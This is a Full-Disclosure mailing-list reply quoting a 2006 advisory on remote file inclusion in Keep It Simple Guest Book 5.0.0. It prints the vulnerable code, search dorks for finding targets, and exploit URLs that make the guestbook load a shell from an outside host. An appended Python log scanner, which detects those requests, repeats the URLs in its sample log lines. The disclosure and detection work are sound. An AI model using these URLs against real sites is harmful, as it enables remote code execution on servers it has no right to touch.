
| Subject: | Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB |
|---|---|
| Date: | Sat, 23 Dec 2006 00:00:06 +0300 |
Dear 0o_zeus_o0 elitemexico.org,

Thanks, published.
http://www.security.nnov.ru/source13365.html

--Friday, December 22, 2006, 11:55:17 PM, you wrote to bugtraq@zone-h.org:

0eo> ###########################################################################
0eo> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
0eo> #
0eo> # Author: 0o_zeus_o0 ( Arturo Z. )
0eo> # Contact: zeus@diosdelared.com
0eo> # Website: www.diosdelared.com
0eo> # Date: 22/12/06
0eo> # Risk: critical
0eo> # Vendor Url: http://sourceforge.net/projects/kisgb,
0eo> http://ravenphpscripts.com
0eo> # Affected Software: Keep It Simple Guest Book
0eo> # search: inurl:kisgb , intitle:KISGB
0eo> #
0eo> #Info:
0eo> ##################################################################
0eo> #The bug is risky since it is possible to include malicious code
0eo> #that allows viewing or modifying files
0eo> #code:
0eo> #if (isset($default_path_for_themes))
0eo> require("$default_path_for_themes/$theme");
0eo> #else require("$path_to_themes/$theme");
0eo> ##################################################################
0eo> #
0eo> #
0eo> #http://site/path/gbpath/authenticate.php?path_to_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/admin.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> ##################################################################
0eo> #VULNERABLE VERSIONS
0eo> ##################################################################
0eo> # 5.0.0
0eo> #
0eo> ##################################################################
0eo> #Contact information
0eo> #0o_zeus_o0
0eo> #zeus@diosdelared.com
0eo> #www.diosdelared.com
0eo> ##################################################################
0eo> #greetz: S.S.M, sams, a mi beba
0eo> #Original Advisory: http://diosdelared.com/15.txt
0eo> ##################################################################

--
~/ZARAZA
Shooting a second time, he maimed a bystander. The bystander was me. (Twain)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
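A defender-side check for the request pattern the advisory above describes, added here as an example and not part of the original thread or of KISGB: it scans constructed Combined Log Format lines for the three scripts and two parameters named in the advisory carrying a remote-URL or PHP stream-wrapper value, which is how an inclusion attempt would surface in web-server logs. The IP addresses and timestamps in the sample lines are made up; only the host name shellsite.com is taken from the advisory text.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory shows reaching require() without validation.
RFI_PARAMS = {"path_to_themes", "default_path_for_themes"}
# Entry points the advisory lists as reachable with those parameters.
RFI_SCRIPTS = {"authenticate.php", "admin.php", "upconfig.php"}
# Value prefixes that make require() load something other than a local theme file.
REMOTE_SCHEME = re.compile(r"^(https?|ftps?|php|data|expect)://", re.IGNORECASE)

# Minimal Combined Log Format matcher: client IP, timestamp, method, request path, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def detect_rfi(line):
    """Return (ip, script, param, value) for a request matching the advisory's
    pattern, or None for anything else (unparseable lines included)."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    script = parts.path.rsplit("/", 1)[-1]
    if script not in RFI_SCRIPTS:
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in RFI_PARAMS:
            continue
        for value in values:
            value = unquote(value)  # parse_qs decoded once; also catch double-encoding
            if REMOTE_SCHEME.match(value):
                return (m.group("ip"), script, name, value)
    return None

# Constructed sample lines (RFC 5737 addresses; shellsite.com is the host named in the advisory).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Dec/2006:23:55:17 +0000] "GET /gb/index.php?theme=default HTTP/1.1" 200 4122',
    '203.0.113.5 - - [22/Dec/2006:23:55:18 +0000] "GET /gb/authenticate.php?path_to_themes=http://shellsite.com/php.gif? HTTP/1.1" 200 318',
    '198.51.100.7 - - [22/Dec/2006:23:56:02 +0000] "GET /gb/admin.php?default_path_for_themes=http%3A%2F%2F198.51.100.7%2Fs.txt%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Dec/2006:23:56:09 +0000] "GET /gb/upconfig.php?default_path_for_themes=themes HTTP/1.1" 200 2048',
    '192.0.2.9 - - [22/Dec/2006:23:57:40 +0000] "GET /gb/admin.php HTTP/1.1" 302 0',
]

def scan(lines):
    """Return every hit in order; two of the five constructed lines above match."""
    return [hit for hit in map(detect_rfi, lines) if hit]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A local theme name (line four of the sample) and a request without the parameter (line five) are not flagged, so the rule keys on the remote scheme rather than on the parameter name alone.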